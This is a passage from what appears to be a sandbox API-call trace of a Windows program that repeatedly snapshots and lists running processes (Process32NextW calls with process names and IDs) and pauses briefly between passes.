th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0109.664] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0109.665] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.666] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0109.667] CloseHandle (hObject=0xc4) returned 1 [0109.667] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0109.672] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.672] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0109.673] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0109.674] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.674] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0109.675] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.676] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0109.676] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0109.677] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0109.678] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0109.678] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.679] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.680] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.680] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.681] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.681] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0109.682] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.683] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.683] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0109.684] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.686] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.687] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0109.688] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0109.690] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0109.691] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.692] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.695] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0109.696] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0109.697] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0109.698] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0109.699] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0109.700] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0109.702] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0109.703] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0109.704] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0109.705] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0109.706] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0109.707] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0109.709] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0109.710] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0109.711] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0109.712] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0109.713] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0109.714] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0109.715] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0109.716] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0109.717] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.718] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0109.719] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0109.720] CloseHandle (hObject=0xbc) returned 1 [0109.720] Sleep (dwMilliseconds=0x12c) [0110.020] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0110.026] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.027] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0110.027] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0110.028] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.029] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0110.029] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.030] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0110.031] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0110.031] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0110.032] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0110.032] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.033] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.034] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.034] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.035] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.036] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0110.036] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.037] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.038] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0110.039] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.040] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.041] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0110.042] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0110.043] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0110.045] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.046] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.047] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0110.048] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0110.049] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0110.050] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 